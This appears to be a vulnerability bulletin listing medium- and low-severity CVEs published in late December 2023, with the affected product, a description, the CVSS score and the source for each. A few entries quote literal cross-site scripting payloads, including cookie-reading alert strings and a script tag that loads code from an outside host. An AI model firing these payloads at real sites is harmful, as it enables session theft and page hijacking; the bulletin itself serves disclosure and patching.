pexip — pexip_infinity Pexip Infinity before 32 allows Webapp1 XSS via preconfigured links. 2023-12-25 6.1 CVE-2023-37225
cve@mitre.org
pexip — virtual_meeting_rooms In Pexip VMR self-service portal before 3, the same SSH host key is used across different customers’ installations, which allows authentication bypass. 2023-12-25 5.3 CVE-2023-40236
cve@mitre.org
phpgurukul — hospital_management_system A vulnerability, which was classified as problematic, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file registration.php. The manipulation of the argument First Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249357 was assigned to this vulnerability. 2023-12-30 4.3 CVE-2023-7173
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /user/add-notes.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248741 was assigned to this vulnerability. 2023-12-22 5.4 CVE-2023-7054
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability classified as problematic has been found in PHPGurukul Online Notes Sharing System 1.0. Affected is an unknown function of the file /user/profile.php of the component Contact Information Handler. The manipulation of the argument mobilenumber leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-248742 is the identifier assigned to this vulnerability. 2023-12-22 5.4 CVE-2023-7055
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been classified as problematic. This affects an unknown part of the file /user/profile.php. The manipulation of the argument name leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248739. 2023-12-22 4.3 CVE-2023-7052
cna@vuldb.com
poly — multiple_products A vulnerability classified as problematic was found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. This vulnerability affects unknown code of the component HTTP Header Handler. The manipulation of the argument Cookie leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249256. 2023-12-29 5.3 CVE-2023-4463
cna@vuldb.com
poly — trio_8800 A vulnerability was found in Poly Trio 8800 7.2.6.0019 and classified as critical. Affected by this issue is some unknown functionality of the component Test Automation Mode. The manipulation leads to backdoor. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249260. 2023-12-29 6.2 CVE-2023-4467
cna@vuldb.com
poly — trio_8800/trio_c60 A vulnerability was found in Poly Trio 8800 and Trio C60. It has been classified as problematic. This affects an unknown part of the component Poly Lens Management Cloud Registration. The manipulation leads to missing authorization. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier VDB-249261 was assigned to this vulnerability. 2023-12-29 4.3 CVE-2023-4468
cna@vuldb.com
pymedusa — medusa Medusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testDiscord` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `discord_webhook` variable and passes it to the `notifiers.discord_notifier.test_notify` method, then `_notify_discord` and finally `_send_discord_msg` method, which sends a POST request to the user-controlled URL on line 64 in `/medusa/notifiers/discord.py`, which leads to a blind server-side request forgery. This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue. 2023-12-22 5.3 CVE-2023-50258
security-advisories@github.com
pymedusa — medusa Medusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testslack` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `slack_webhook` variable and passes it to the `notifiers.slack_notifier.test_notify` method, then `_notify_slack` and finally `_send_slack` method, which sends a POST request to the user-controlled URL on line 103 in `/medusa/notifiers/slack.py`, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue. 2023-12-22 5.3 CVE-2023-50259
security-advisories@github.com
red_hat — multiple_products A flaw was found in shadow-utils. When asking for a new password, shadow-utils asks the password twice. If the password fails on the second attempt, shadow-utils fails in cleaning the buffer used to store the first entry. This may allow an attacker with enough access to retrieve the password from the memory. 2023-12-27 4.7 CVE-2023-4641
secalert@redhat.com
red_hat — multiple_products A vulnerability was found in systemd-resolved. This issue may allow systemd-resolved to accept records of DNSSEC-signed domains even when they have no signature, allowing man-in-the-middles (or the upstream DNS resolver) to manipulate records. 2023-12-23 5.9 CVE-2023-7008
secalert@redhat.com
resque — resque Resque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. The following paths in resque-web have been found to be vulnerable to reflected XSS: “/failed/?class=<script>alert(document.cookie)</script>” and “/queues/><img src=a onerror=alert(document.cookie)>”. This issue has been patched in version 2.2.1. 2023-12-22 6.3 CVE-2023-50725
security-advisories@github.com
resque — resque Resque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. Reflected XSS issue occurs when /queues is appended with /”><svg%20onload=alert(domain)>. This issue has been patched in version 2.6.0. 2023-12-22 6.3 CVE-2023-50727
security-advisories@github.com
sentry — symbolicator Symbolicator is a service used in Sentry. Starting in Symbolicator version 0.3.3 and prior to version 21.12.1, an attacker could make Symbolicator send GET HTTP requests to arbitrary URLs with internal IP addresses by using an invalid protocol. The responses of those requests could be exposed via Symbolicator’s API. In affected Sentry instances, the data could be exposed through the Sentry API and user interface if the attacker has a registered account. The issue has been fixed in Symbolicator release 23.12.1, Sentry self-hosted release 23.12.1, and has already been mitigated on sentry.io on December 18, 2023. If updating is not possible, some other mitigations are available. One may disable JS processing by toggling the option `Allow JavaScript Source Fetching` in `Organization Settings > Security & Privacy` and/or disable all untrusted public repositories under `Project Settings > Debug Files`. Alternatively, if JavaScript and native symbolication are not required, disable Symbolicator completely in `config.yml`. 2023-12-22 4.3 CVE-2023-51451
security-advisories@github.com
shifuml — shifu A vulnerability has been found in ShifuML shifu 0.12.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file src/main/java/ml/shifu/shifu/core/DataPurifier.java of the component Java Expression Language Handler. The manipulation of the argument FilterExpression leads to code injection. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249151. 2023-12-29 5 CVE-2023-7148
cna@vuldb.com
snowflakedb — snowflake-connector-net The Snowflake .NET driver provides an interface to the Microsoft .NET open source software framework for developing applications. Snowflake recently received a report about a vulnerability in the Snowflake Connector .NET where the checks against the Certificate Revocation List (CRL) were not performed where the insecureMode flag was set to false, which is the default setting. The vulnerability affects versions between 2.0.25 and 2.1.4 (inclusive). Snowflake fixed the issue in version 2.1.5. 2023-12-22 6 CVE-2023-51662
security-advisories@github.com
sourcecodester — free_and_open_source_inventory_management_system A vulnerability, which was classified as critical, was found in SourceCodester Free and Open Source Inventory Management System 1.0. This affects an unknown part of the file /ample/app/action/edit_product.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249177 was assigned to this vulnerability. 2023-12-29 6.3 CVE-2023-7155
cna@vuldb.com
sourcecodester — free_and_open_source_inventory_management_system A vulnerability was found in SourceCodester Free and Open Source Inventory Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /app/ajax/sell_return_data.php. The manipulation of the argument columns[0][data] leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249179. 2023-12-29 6.3 CVE-2023-7157
cna@vuldb.com
sourcecodester — medicine_tracking_system A vulnerability, which was classified as critical, has been found in SourceCodester Medicine Tracking System 1.0. This issue affects some unknown processing of the file /classes/Master.php?f=save_medicine. The manipulation of the argument id/name/description leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249095. 2023-12-28 6.3 CVE-2023-7123
cna@vuldb.com
sourcecodester — medicine_tracking_system A vulnerability was found in SourceCodester Medicine Tracking System 1.0. It has been rated as critical. This issue affects some unknown processing. The manipulation of the argument page leads to path traversal: ‘../filedir’. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249137 was assigned to this vulnerability. 2023-12-28 6.3 CVE-2023-7134
cna@vuldb.com
sourcecodester — school_visitor_log_e-book A vulnerability was found in SourceCodester School Visitor Log e-Book 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file log-book.php. The manipulation of the argument Full Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248750 is the identifier assigned to this vulnerability. 2023-12-22 5.4 CVE-2023-7059
cna@vuldb.com
sqlite — sqlite3 A vulnerability was found in SQLite SQLite3 up to 3.43.0 and classified as critical. This issue affects the function sessionReadRecord of the file ext/session/sqlite3session.c of the component make alltest Handler. The manipulation leads to heap-based buffer overflow. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-248999. 2023-12-29 5.5 CVE-2023-7104
cna@vuldb.com
sudo — sudo A flaw was found in sudo in the handling of ipa_hostname, where ipa_hostname from /etc/sssd/sssd.conf was not propagated in sudo. Therefore, it leads to privilege mismanagement vulnerability in applications, where client hosts retain privileges even after retracting them. 2023-12-23 6.6 CVE-2023-7090
secalert@redhat.com
talent_software — ecop Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Talent Software ECOP allows Reflected XSS. This issue affects ECOP: before 32255. 2023-12-28 6.1 CVE-2023-4672
iletisim@usom.gov.tr
tongda — office_anywhere A vulnerability has been found in Tongda OA 2017 up to 11.9 and classified as critical. Affected by this vulnerability is an unknown functionality of the file general/project/proj/delete.php. The manipulation of the argument PROJ_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-249367. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-30 5.5 CVE-2023-7180
cna@vuldb.com
uniway — uw-302vp A vulnerability was found in Uniway UW-302VP 2.0. It has been rated as problematic. This issue affects some unknown processing of the file /boaform/wlan_basic_set.cgi of the component Admin Web Interface. The manipulation of the argument wlanssid/password leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248939. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-24 4.3 CVE-2023-7092
cna@vuldb.com
weiye-jing — datax-web A vulnerability, which was classified as critical, has been found in WeiYe-Jing datax-web 2.1.2. Affected by this issue is some unknown functionality of the file /api/log/killJob of the component HTTP POST Request Handler. The manipulation of the argument processId leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249086 is the identifier assigned to this vulnerability. 2023-12-27 6.3 CVE-2023-7116
cna@vuldb.com
wordpress — wordpress The Widget Settings Importer/Exporter Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wp_ajax_import_widget_dataparameter AJAX action in versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with subscriber-level permissions and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-12-23 5.4 CVE-2020-36769
security@wordfence.com
security@wordfence.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Gesundheit Bewegt GmbH Zippy. This issue affects Zippy: from n/a through 1.6.5. 2023-12-28 6.6 CVE-2023-36381
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Themeum WP Crowdfunding allows Stored XSS. This issue affects WP Crowdfunding: from n/a through 2.1.6. 2023-12-28 6.5 CVE-2023-50859
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in TMS Booking for Appointments and Events Calendar – Amelia allows Stored XSS. This issue affects Booking for Appointments and Events Calendar – Amelia: from n/a through 1.0.85. 2023-12-28 6.5 CVE-2023-50860
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Darren Cooney WordPress Infinite Scroll – Ajax Load More allows Stored XSS. This issue affects WordPress Infinite Scroll – Ajax Load More: from n/a through 6.1.0.1. 2023-12-28 6.5 CVE-2023-50874
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Automattic WordPress.Com Editing Toolkit allows Stored XSS. This issue affects WordPress.Com Editing Toolkit: from n/a through 3.78784. 2023-12-29 6.5 CVE-2023-50879
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in The BuddyPress Community BuddyPress allows Stored XSS. This issue affects BuddyPress: from n/a through 11.3.1. 2023-12-29 6.5 CVE-2023-50880
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in AAM Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More allows Stored XSS. This issue affects Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More: from n/a through 6.9.15. 2023-12-29 6.5 CVE-2023-50881
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in The Beaver Builder Team Beaver Builder – WordPress Page Builder allows Stored XSS. This issue affects Beaver Builder – WordPress Page Builder: from n/a through 2.7.2. 2023-12-29 6.5 CVE-2023-50889
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Zoho Forms Form plugin for WordPress – Zoho Forms allows Stored XSS. This issue affects Form plugin for WordPress – Zoho Forms: from n/a through 3.0.1. 2023-12-29 6.5 CVE-2023-50891
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Brizy.Io Brizy – Page Builder allows Stored XSS. This issue affects Brizy – Page Builder: from n/a through 2.4.29. 2023-12-29 6.5 CVE-2023-51396
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Brainstorm Force WP Remote Site Search allows Stored XSS. This issue affects WP Remote Site Search: from n/a through 1.0.4. 2023-12-29 6.5 CVE-2023-51397
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WPFactory Back Button Widget allows Stored XSS. This issue affects Back Button Widget: from n/a through 1.6.3. 2023-12-29 6.5 CVE-2023-51399
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Aleksandar Urošević Stock Ticker allows Stored XSS. This issue affects Stock Ticker: from n/a through 3.23.4. 2023-12-29 6.5 CVE-2023-51541
audit@patchstack.com
wordpress — wordpress Unofficial Mobile BankID Integration for WordPress lets users employ Mobile BankID to authenticate themselves on your WordPress site. Prior to 1.0.1, WP-Mobile-BankID-Integration is affected by a vulnerability classified as a Deserialization of Untrusted Data vulnerability, specifically impacting scenarios where an attacker can manipulate the database. If unauthorized actors gain access to the database, they could exploit this vulnerability to execute object injection attacks. This could lead to unauthorized code execution, data manipulation, or data exfiltration within the WordPress environment. Users of the plugin should upgrade to version 1.0.1 (or later), where the serialization and deserialization of OrderResponse objects have been switched out to an array stored as JSON. A possible workaround for users unable to upgrade immediately is to enforce stricter access controls on the database, ensuring that only trusted and authorized entities can modify data. Additionally, implementing monitoring tools to detect unusual database activities could help identify and mitigate potential exploitation attempts. 2023-12-27 6.4 CVE-2023-51700
security-advisories@github.com
security-advisories@github.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BoxyStudio Booked – Appointment Booking for WordPress | Calendars. This issue affects Booked – Appointment Booking for WordPress | Calendars: from n/a before 2.4.4. 2023-12-28 5.3 CVE-2022-36399
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in VeronaLabs WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc. This issue affects WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc: from n/a through 6.0.4. 2023-12-28 5.3 CVE-2023-27447
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ibericode HTML Forms allows Stored XSS. This issue affects HTML Forms: from n/a through 1.3.28. 2023-12-28 5.9 CVE-2023-50836
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Bill Minozzi Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan. This issue affects Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan: from n/a through 4.34. 2023-12-28 5.4 CVE-2023-50858
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in InspireUI MStore API. This issue affects MStore API: from n/a through 4.10.1. 2023-12-29 5.4 CVE-2023-50878
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in weForms weForms – Easy Drag & Drop Contact Form Builder For WordPress allows Stored XSS. This issue affects weForms – Easy Drag & Drop Contact Form Builder For WordPress: from n/a through 1.6.17. 2023-12-29 5.9 CVE-2023-50896
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Bright Plugins Block IPs for Gravity Forms. This issue affects Block IPs for Gravity Forms: from n/a through 1.0.1. 2023-12-29 5.4 CVE-2023-51358
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Ginger Plugins Sticky Chat Widget: Click to chat, SMS, Email, Messages, Call Button, Live Chat and Live Support Button allows Stored XSS. This issue affects Sticky Chat Widget: Click to chat, SMS, Email, Messages, Call Button, Live Chat and Live Support Button: from n/a through 1.1.8. 2023-12-29 5.9 CVE-2023-51361
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Bit Assist Chat Widget: WhatsApp Chat, Facebook Messenger Chat, Telegram Chat Bubble, Line Messenger, Live Chat Support Chat Button, WeChat, SMS, Call Button, Customer Support Button with floating Chat Widget allows Stored XSS. This issue affects Chat Widget: WhatsApp Chat, Facebook Messenger Chat, Telegram Chat Bubble, Line Messenger, Live Chat Support Chat Button, WeChat, SMS, Call Button, Customer Support Button with floating Chat Widget: from n/a through 1.1.9. 2023-12-29 5.9 CVE-2023-51371
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in HasThemes HashBar – WordPress Notification Bar allows Stored XSS. This issue affects HashBar – WordPress Notification Bar: from n/a through 1.4.1. 2023-12-29 5.9 CVE-2023-51372
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ZeroBounce ZeroBounce Email Verification & Validation allows Stored XSS. This issue affects ZeroBounce Email Verification & Validation: from n/a through 1.0.11. 2023-12-29 5.9 CVE-2023-51374
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Rise Themes Rise Blocks – A Complete Gutenberg Page Builder. This issue affects Rise Blocks – A Complete Gutenberg Page Builder: from n/a through 3.1. 2023-12-29 5.4 CVE-2023-51378
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Senol Sahin AI Power: Complete AI Pack – Powered by GPT-4. This issue affects AI Power: Complete AI Pack – Powered by GPT-4: from n/a through 1.8.2. 2023-12-29 5.3 CVE-2023-51527
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in impleCode Product Catalog Simple. This issue affects Product Catalog Simple: from n/a through 1.7.6. 2023-12-29 5.3 CVE-2023-51687
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in impleCode eCommerce Product Catalog Plugin for WordPress. This issue affects eCommerce Product Catalog Plugin for WordPress: from n/a through 3.3.26. 2023-12-29 5.3 CVE-2023-51688
audit@patchstack.com
wordpress — wordpress The Divi theme for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘et_pb_text’ shortcode in all versions up to, and including, 4.23.1 due to insufficient input sanitization and output escaping on user supplied custom field data. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-12-23 5.4 CVE-2023-6744
security@wordfence.com
security@wordfence.com
wordpress — wordpress A vulnerability was found in BestWebSoft Portfolio Plugin up to 2.04 on WordPress. It has been classified as problematic. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 2.06 is able to address this issue. The patch is named 68af950330c3202a706f0ae9bbb52ceaa17dda9d. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248955. 2023-12-26 4.3 CVE-2012-10017
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CRM Perks Integration for HubSpot and Contact Form 7, WPForms, Elementor, Ninja Forms. This issue affects Integration for HubSpot and Contact Form 7, WPForms, Elementor, Ninja Forms: from n/a through 1.2.8. 2023-12-29 4.7 CVE-2023-31095
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in WP Directory Kit. This issue affects WP Directory Kit: from n/a through 1.1.9. 2023-12-29 4.7 CVE-2023-31229
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Dylan James Zephyr Project Manager. This issue affects Zephyr Project Manager: from n/a through 3.3.9. 2023-12-29 4.7 CVE-2023-31237
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Pexle Chris Library Viewer. This issue affects Library Viewer: from n/a through 2.0.6. 2023-12-29 4.7 CVE-2023-32101
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in PluginOps MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder. This issue affects MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder: from n/a through 4.0.9.3. 2023-12-29 4.7 CVE-2023-32517
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Marios Alexandrou Add Any Extension to Pages. This issue affects Add Any Extension to Pages: from n/a through 1.4. 2023-12-28 4.3 CVE-2023-50873
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WPExpertsio New User Approve. This issue affects New User Approve: from n/a through 2.5.1. 2023-12-29 4.3 CVE-2023-50902
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WebbaPlugins Appointment & Event Booking Calendar Plugin – Webba Booking. This issue affects Appointment & Event Booking Calendar Plugin – Webba Booking: from n/a through 4.5.33. 2023-12-29 4.3 CVE-2023-51354
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Brain Storm Force Ultimate Addons for WPBakery Page Builder. This issue affects Ultimate Addons for WPBakery Page Builder: from n/a through 3.19.17. 2023-12-29 4.3 CVE-2023-51402
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CodePeople Calculated Fields Form. This issue affects Calculated Fields Form: from n/a through 1.2.28. 2023-12-29 4.1 CVE-2023-51517
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in AAM Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More. This issue affects Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More: from n/a through 6.9.18. 2023-12-29 4.7 CVE-2023-51675
audit@patchstack.com
wordpress — wordpress Server-Side Request Forgery (SSRF) vulnerability in Leevio Happy Addons for Elementor. This issue affects Happy Addons for Elementor: from n/a through 3.9.1.1. 2023-12-29 4.9 CVE-2023-51676
audit@patchstack.com
y_project — ruoyi A vulnerability was found in y_project RuoYi 4.7.8. It has been declared as problematic. This vulnerability affects unknown code of the file /login of the component HTTP POST Request Handler. The manipulation of the argument rememberMe with the input falsen3f0m<script>alert(1)</script>p86o0 leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249136. 2023-12-28 4.3 CVE-2023-7133
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
yiisoft — yii2-authclient yii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth1/2 `state` and OpenID Connect `nonce` is vulnerable for a `timing attack` since it is compared via regular string comparison (instead of `Yii::$app->getSecurity()->compareString()`). Version 2.2.15 contains a patch for the issue. No known workarounds are available. 2023-12-22 6.1 CVE-2023-50708
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
yiisoft — yii2-authclient yii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth2 PKCE implementation is vulnerable in 2 ways. First, the `authCodeVerifier` should be removed after usage (similar to `authState`). Second, there is a risk for a `downgrade attack` if PKCE is being relied on for CSRF protection. Version 2.2.15 contains a patch for the issue. No known workarounds are available. 2023-12-22 6.8 CVE-2023-50714
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
ìzmir_katip_çelebi_university — university_information_management_system Improper Input Validation vulnerability in İzmir Katip Çelebi University University Information Management System allows Absolute Path Traversal. This issue affects University Information Management System: before 30.11.2023. 2023-12-27 6.5 CVE-2023-6190
iletisim@usom.gov.tr


Low Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
bestwebsoft — portfolio_plugin A vulnerability was found in BestWebSoft Portfolio Plugin up to 2.27. It has been declared as problematic. This vulnerability affects the function bws_add_menu_render of the file bws_menu/bws_menu.php. The manipulation of the argument bwsmn_form_email leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 2.28 is able to address this issue. The name of the patch is d2ede580474665af56ff262a05783fbabe4529b8. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248956. 2023-12-26 3.5 CVE-2014-125109
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — client_details_system A vulnerability was found in code-projects Client Details System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/regester.php. The manipulation of the argument fname/lname/email/contact leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249146 is the identifier assigned to this vulnerability. 2023-12-29 2.4 CVE-2023-7143
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — intern_membership_management_system A vulnerability was found in code-projects Intern Membership Management System 2.0. It has been classified as problematic. This affects an unknown part of the file /user_registration/ of the component User Registration. The manipulation of the argument userName/firstName/lastName/userEmail with the input “><ScRiPt>confirm(document.domain)</ScRiPt>h0la leads to cross site scripting. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249135. 2023-12-28 3.5 CVE-2023-7132
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — qr_code_generator A vulnerability was found in code-projects QR Code Generator 1.0. It has been classified as problematic. This affects an unknown part of the file /download.php?file=author.png. The manipulation of the argument file with the input “><iMg src=N onerror=alert(document.domain)> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249153 was assigned to this vulnerability. 2023-12-29 3.5 CVE-2023-7149
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — record_management_system A vulnerability classified as problematic has been found in code-projects Record Management System 1.0. Affected is an unknown function of the file /main/offices.php of the component Offices Handler. The manipulation of the argument officename with the input “><script src=”https://js.rip/b23tmbxf49”></script> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249138 is the identifier assigned to this vulnerability. 2023-12-28 2.4 CVE-2023-7135
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — record_management_system A vulnerability classified as problematic was found in code-projects Record Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /main/doctype.php of the component Document Type Handler. The manipulation of the argument docname with the input “><script src=”https://js.rip/b23tmbxf49”></script> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249139. 2023-12-28 2.4 CVE-2023-7136
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
honor — com.hihonor.magichome Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 3.3 CVE-2023-23430
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — com.hihonor.vmall Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak. 2023-12-29 3.3 CVE-2023-23437
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — lge-an00 Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak. 2023-12-29 3.3 CVE-2023-23440
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 3.3 CVE-2023-23428
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_ui Some Honor products are affected by out of bounds read vulnerability, successful exploitation could cause information leak. 2023-12-29 3.2 CVE-2023-51432
3836d913-7555-4dd0-a509-f5667fdf5fe4
